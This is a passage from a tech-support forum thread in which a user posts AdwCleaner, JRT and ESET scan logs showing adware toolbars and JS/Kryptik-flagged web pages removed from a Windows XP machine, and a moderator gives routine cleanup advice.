Folder Deleted : C:\Documents and Settings\Lynne\Application Data\Mozilla\Firefox\Profiles\z72x27iq.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
Folder Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\Extensions\{93ec97bf-fe43-4bca-a735-5c5d6a0a40c4}
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\Extensions\addon@defaulttab.com.xpi
File Deleted : C:\WINDOWS\system32\ImhxxpComm.dll
File Deleted : C:\Program Files\Mozilla Firefox\browser\nsprotector.js
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\searchplugins\Conduit.xml
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\searchplugins\MyStart Search.xml
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\user.js
File Deleted : C:\Documents and Settings\Lynne\Application Data\Mozilla\Firefox\Profiles\z72x27iq.default\user.js

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKCU\Toolbar
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SearchProtect
Key Deleted : HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SearchProtectAll
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT2462170
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3314312
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4634A024-1754-4A6D-B4C0-4968168E3B7B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{304E71B8-633E-4C36-996A-7D21D9D1518F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{304E71B8-633E-4C36-996A-7D21D9D1518F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{4634A024-1754-4A6D-B4C0-4968168E3B7B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8856F9B5-8BAB-4F4A-A3CF-E4F2B4A064B7}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{145C55D0-AE5A-4782-B5E6-3E774B24F1EC}
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{93EC97BF-FE43-4BCA-A735-5C5D6A0A40C4}]
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\DefaultTab
Key Deleted : HKCU\Software\IM
Key Deleted : HKCU\Software\ImInstaller
Key Deleted : HKCU\Software\SmartBar
Key Deleted : HKCU\Software\wecarereminder
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\SweetPacks_A5
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\Conduit
Key Deleted : HKLM\Software\SearchProtect
Key Deleted : HKLM\Software\Viewpoint
Key Deleted : HKLM\Software\wnlt
Key Deleted : HKLM\Software\SweetPacks_A5

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.6001.18702


-\\ Mozilla Firefox v27.0.1 (en-US)

[ File : C:\Documents and Settings\LocalService\Application Data\Mozilla\Firefox\Profiles\s718l8fc.default\prefs.js ]


[ File : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\prefs.js ]

Line Deleted : user_pref("CT3314312.FF19Solved", "true");
Line Deleted : user_pref("CT3314312.UserID", "UN80889145624715380");
Line Deleted : user_pref("CT3314312.browser.search.defaultthis.engineName", "true");
Line Deleted : user_pref("CT3314312.fullUserID", "UN80889145624715380.IN.20131016175509");
Line Deleted : user_pref("CT3314312.installDate", "16/10/2013 17:55:13");
Line Deleted : user_pref("CT3314312.installSessionId", "{5F4D2349-01D8-4E6F-991B-3504C1D6020B}");
Line Deleted : user_pref("CT3314312.installSp", "TRUE");
Line Deleted : user_pref("CT3314312.installerVersion", "1.7.1.7");
Line Deleted : user_pref("CT3314312.keyword", "true");
Line Deleted : user_pref("CT3314312.originalHomepage", "hxxp://att.my.yahoo.com/");
Line Deleted : user_pref("CT3314312.originalSearchAddressUrl", "");
Line Deleted : user_pref("CT3314312.originalSearchEngine", "XFINITY");
Line Deleted : user_pref("CT3314312.originalSearchEngineName", "XFINITY");
Line Deleted : user_pref("CT3314312.searchRevert", "false");
Line Deleted : user_pref("CT3314312.searchUserMode", "2");
Line Deleted : user_pref("CT3314312.smartbar.homepage", "true");
Line Deleted : user_pref("CT3314312.versionFromInstaller", "10.20.3.20");
Line Deleted : user_pref("CT3314312.xpeMode", "0");
Line Deleted : user_pref("Smartbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3314312&octid=CT3314312&SearchSource=61&CUI=UN80889145624715380&UM=2&UP=SPCC51B416-8F66-4545-A3BF-662FF87F05A0");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Deleted : user_pref("browser.download.lastDir", "C:\\Documents and Settings\\Roland\\My Documents\\My Webs\\myweb");
Line Deleted : user_pref("browser.search.defaultenginename", "SweetPacks A5 Customized Web Search");
Line Deleted : user_pref("browser.search.defaultthis.engineName", "SweetPacks A5 Customized Web Search");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3314312&CUI=UN80889145624715380&UM=2&SearchSource=3&q={searchTerms}");
Line Deleted : user_pref("browser.search.selectedEngine", "SweetPacks A5 Customized Web Search");
Line Deleted : user_pref("keyword.URL", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3314312&SearchSource=2&CUI=UN80889145624715380&UM=2&q=");
Line Deleted : user_pref("smartbar.addressBarOwnerCTID", "CT3314312");
Line Deleted : user_pref("smartbar.conduitHomepageList", "hxxp://search.conduit.com/?ctid=CT3314312&CUI=UN80889145624715380&UM=2&SearchSource=13,hxxp://search.conduit.com/?ctid=CT3314312&octid=CT3314312&SearchSource[...]
Line Deleted : user_pref("smartbar.conduitSearchAddressUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3314312&SearchSource=2&CUI=UN80889145624715380&UM=2&q=");
Line Deleted : user_pref("smartbar.defaultSearchOwnerCTID", "CT3314312");
Line Deleted : user_pref("smartbar.homePageOwnerCTID", "CT3314312");
Line Deleted : user_pref("smartbar.machineId", "/MT6XVNITSKR2FPNNENZT9JOIYKUDNWYUOFW8XGJYRXBPZWMWXK+8A9/WZL36ABY47QTUZESLTMGPXU5HSXTNG");
Line Deleted : user_pref("smartbar.originalHomepage", "hxxp://search.conduit.com/?ctid=CT3314312&CUI=UN80889145624715380&UM=2&SearchSource=13");

[ File : C:\Documents and Settings\Lynne\Application Data\Mozilla\Firefox\Profiles\z72x27iq.default\prefs.js ]


[ File : C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\m44p6sa5.default\prefs.js ]


*************************

AdwCleaner[R0].txt - [10745 octets] - [27/03/2014 18:14:37]
AdwCleaner[S0].txt - [10757 octets] - [27/03/2014 18:40:18]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [10818 octets] ##########
 



#6 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 27 March 2014 - 06:36 PM

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.3 (03.23.2014:1)
OS: Microsoft Windows XP x86
Ran by Roland on Thu 03/27/2014 at 19:15:54.48
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\yt.ytnavassistplugin
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\yt.ytnavassistplugin.1
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{180780f0-b348-4b44-8210-94a8f3ee15b2}
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{46C9CE0D-7746-4A71-896C-E7B56079E90B}
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{D3C46456-6D3A-4FAE-A46F-25FF20582283}



~~~ Files

Successfully deleted: [File] "C:\Program Files\mozilla firefox\plugins\npcouponprinter.dll"



~~~ Folders

Successfully deleted: [Folder] "C:\Program Files\coupons"



~~~ FireFox

Emptied folder: C:\Documents and Settings\Roland\Application Data\mozilla\firefox\profiles\eeah4ch5.default\minidumps [4 files]





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 03/27/2014 at 19:22:41.14
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 



#7 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 27 March 2014 - 09:04 PM

C:\Documents and Settings\Roland\My Documents\couponprinter.exe    probably a variant of Win32/Adware.Softomate.AD application    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\041665.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\053159.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\101158mobileunit.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150031567.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150042667.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150071967.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150081865.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150102765.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501027652.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1501967may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150ap.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150dallas.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150movies.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150patton.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150promotion.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150tech.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150theatres.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150thebible.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\150ua.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953deluxe.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_december.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1953_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1954_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1955_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1956_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1956_June.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1956_Sept.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1957_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1957_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1957_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1958_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1958_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1958_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1959_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1959_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1960_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1960_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961interama.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1961_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962holidayad.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgad.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgcredits.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgdragon.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbgfirstpage.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962wwotbghorses.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_december.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_January.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1962_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_december.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_october.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1963_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964cineramaweekend.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_april.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_august.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_December.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_february.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_january.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_july.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_june.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_march.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_may.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_november.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
C:\Documents and Settings\Roland\My Documents\My Webs\myweb\1964_september.htm    JS/Kryptik.AOG trojan    cleaned by deleting - quarantined
 



#8 boopme

    To Insanity and Beyond

  • Global Moderator
  • 73,331 posts
  • Gender:Male
  • Location:NJ USA

Posted 28 March 2014 - 02:54 PM

This older version can be exploited, so remove it through Control Panel:
Java™ 6 Update 20 (Version: 6.0.200)

All the Kryptik files were exploits and have been removed.

Empty your temp folders using TFC (Temporary File Cleaner)
  • Please download TFC by Old Timer and save it to your desktop.
    alternate download link
  • Save any unsaved work. (TFC will close ALL open programs including your browser!)
  • Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)
  • Click the Start button to begin the cleaning process and let it run uninterrupted to completion.
  • Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.
Looks clean.
How is it now?
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#9 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 30 March 2014 - 09:05 AM

I think that did it! I need to recreate those files that were deleted and see if the web site is OK.



#10 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 30 March 2014 - 09:06 AM

Are those files that were deleted available anywhere?



#11 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 30 March 2014 - 12:11 PM

I forgot to do the following on ESET:

  • Scan potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth technology

Do I select "delete files quarantined"?

It came up with the following when I ran ESET again:

C:\AdwCleaner\Backup\C\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\prefs_27_03_2014_18_40_29.js    JS/SecurityDisabler.A.Gen potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\user.js.vir    JS/SecurityDisabler.A.Gen potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\hk64tbSwee.dll.vir    a variant of Win64/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\hktbSwee.dll.vir    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\ldrtbSwee.dll.vir    a variant of Win32/Toolbar.Conduit.P potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5\tbSwee.dll.vir    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Mozilla Firefox\browser\nsprotector.js.vir    Win32/Conduit.SearchProtect.A potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\prefs.js    JS/SecurityDisabler.A.Gen potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Roland\My Documents\freeonlinetvplayer.exe    a variant of Win32/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Roland\My Documents\Downloads\KeyFinderInstaller(1).exe    Win32/OpenCandy potentially unsafe application    deleted - quarantined
C:\Documents and Settings\Roland\My Documents\Downloads\KeyFinderInstaller.exe    Win32/OpenCandy potentially unsafe application    deleted - quarantined
C:\i386\dmwu.exe    a variant of Win32/Toolbar.Perion.G potentially unwanted application    deleted - quarantined
C:\i386\wrtc.exe    a variant of Win32/Toolbar.Perion.G potentially unwanted application    deleted - quarantined
C:\Program Files\Trend Micro\HiJackThis\backups\backup-20100718-090326-719.dll    a variant of Win32/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\SDFix\apps\Process.exe    Win32/PrcView potentially unsafe application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109401.dll    a variant of Win64/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109402.dll    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
